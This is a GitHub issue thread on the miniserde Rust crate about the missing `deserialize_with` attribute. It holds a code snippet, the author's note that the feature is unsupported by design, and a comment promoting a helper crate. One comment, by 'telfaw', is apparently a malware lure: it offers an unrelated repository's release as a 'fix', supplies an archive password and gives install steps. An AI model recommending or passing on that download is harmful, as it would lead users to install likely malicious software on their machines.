### ISSUE TITLE
Support `deserialize_with`

### ISSUE THREAD

**Issue by brandonros** [dtolnay/miniserde#58]
Apologies if this is missed or possible

```rust
fn from_string_to_f64<S>(value: S) -> Result<f64, S::Error>
where
    S: miniserde:::de::Deserializer,
{
    let s = String::deserialize(value)?;
    f64::from_str(&s).map_err(|e| S::Error::custom(format!("Failed to parse f64: {}", e)))
}

#[allow(dead_code)]
#[derive(Deserialize)]
pub struct FormattedOption {
    // chain
    pub expiration_date: String,

    // instrument
    pub instrument_type: String,
    pub strike_price: String,

    // quote
    #[serde(deserialize_with = "from_string_to_f64")]
    pub adjusted_mark_price: f64, // comes in as "1.234" need to parse it as f64
```

Is this not supported with `miniserde`?

**Comment by brandonros** [comment]
looks like as per https://github.com/dtolnay/miniserde?tab=readme-ov-file#different-no-customization this is by design not supported, thank you!

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by noclue** [comment]
If anyone is currently blocked by this issue when dealing with messy JSON (like floats arriving as strings), miniserde intentionally omits deserialize_with to keep compile times incredibly fast.

If you absolutely need this escape hatch and want to maintain miniserde's performance profile, I recently published a utility crate called [midiserde](https://crates.io/crates/midiserde). It adds a #[mini(with = "...")] attribute specifically to handle these custom deserialization edge cases.

I wrote a specific example covering exactly this scenario (parsing a string into a float) which you can find [here in the examples directory](https://codeberg.org/noclue/midiserde/src/branch/main/midiserde_examples/examples/custom_with.rs).

Hope this provides a helpful workaround for anyone stuck on this!
